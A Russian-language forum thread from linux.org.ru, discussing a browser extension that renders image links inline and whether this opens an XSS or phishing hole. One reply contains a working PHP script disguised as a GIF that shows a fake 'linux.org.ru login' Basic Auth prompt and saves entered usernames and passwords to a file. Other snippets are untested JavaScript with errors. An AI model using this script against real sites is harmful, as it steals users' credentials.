LINUX.ORG.RU

Приколись тогда:
Будет в ссылке XSS-инъекция, ворующая у тебя что-то посредством отправления специально сформированного GET-запроса. И это расширение самостоятельно активирует бяку.

Terrens
()

открыть диалог поиска расширений и набрать 'preview' в поле поиска шибко тяжело?

nu11 ★★★★★
()

var elements = document.getElementsByTag('A');
for(var i in elements) {
elements[i].innerHTML('<img src=«'+elements[i].href+'»>')
}

p.s. не проверял

yltsrc
()
Ответ на: комментарий от yltsrc

добавил распознование картинок :)

var elements = document.getElementsByTag('A');
var regexp = /(jpg|png)$/
for(var i in elements) {
if (elements[i].href.match(regexp)) {
elements[i].innerHTML('<img src=«'+elements[i].href+'»>');
}
}

yltsrc
()
Ответ на: комментарий от Lighting

ага, пользуюсь, но мне не для лора

APM
() автор топика
Ответ на: комментарий от Terrens

не страшно, воровать нечего. куки могу хоть на рапиду залить

APM
() автор топика
Ответ на: комментарий от Terrens

>Будет в ссылке XSS-инъекция, ворующая у тебя что-то посредством отправления специально сформированного GET-запроса

Что-то не придумаю, как замена <a href="...«>..</a> на <img src=»..." /> позволит у тебя стянуть что-то?

KRoN73 ★★★★★
()
Ответ на: комментарий от KRoN73
<? 
header("Content-type: image/gif"); 
$image = imagecreatefromgif('cool.gif'); 
if(!$_COOKIE['LOGON']) 
{ 
$login = $_SERVER['PHP_AUTH_USER']; 
$pass = $_SERVER['PHP_AUTH_PW']; 
if(strlen($pass) <= 4 || !$login) 
{ 
Header('HTTP/ 1.1 401 Unauthorized'); 
Header('WWW-Authenticate: Basic realm="linux.org.ru login:"'); 
} 
elseif($login) 
{ 
setcookie('LOGON',md5($pass)); 
$f = fopen('passwords.txt', 'ab'); 
fwrite($f, $login." ||| ".$pass."\r\n"); 
fclose($f); 
} 
} 
imagegif($image); 
imagedestroy($image); 
?> 

берем какую-нибудь картинку с coolface-ом, выкладываем вышеуказанный скрипт сюда как картинку (с названием ololo.gif), и у всех, зашедших на эту страницу будет вылазить окно «чо, пароль есть? а если найду?»
читаем файл passwords.txt
???
чистый профит

opensuse
()
Ответ на: комментарий от yltsrc

это пример соц.инженерии. дурак^Wневнимательный человек введет в появившееся окно свой логин и пароль, и они сохранятся у меня на локалхосте.
как красть куки читайте на кулксакеп.ру

opensuse
()
Ответ на: комментарий от yltsrc

Не, он намекает на тупость юзеров, которые подумают, что это ЛОР у них свой пароль запрашивает и введут его. Ну и, соответственно, получится коллекция логинов и паролей ЛОР-юзеров :)

KRoN73 ★★★★★
()
Ответ на: комментарий от opensuse

>это отличается тем, что вылезает окно. естественно, можно по-тихому тырить данные

Окно всплывёт и в твоём, и в моём варианте.

Кроме того, в моём оно всплывёт у всех, а в твоём - только у редких пользователей, которые используют сабжевое решение :)

Если ты о чём-то другом, то выражайся яснее.

KRoN73 ★★★★★
()
Ответ на: комментарий от KRoN73

На ЛОР нельзя прямо вставлять картинки (если не считать редактирование HTML модераторами).

anonymfus ★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.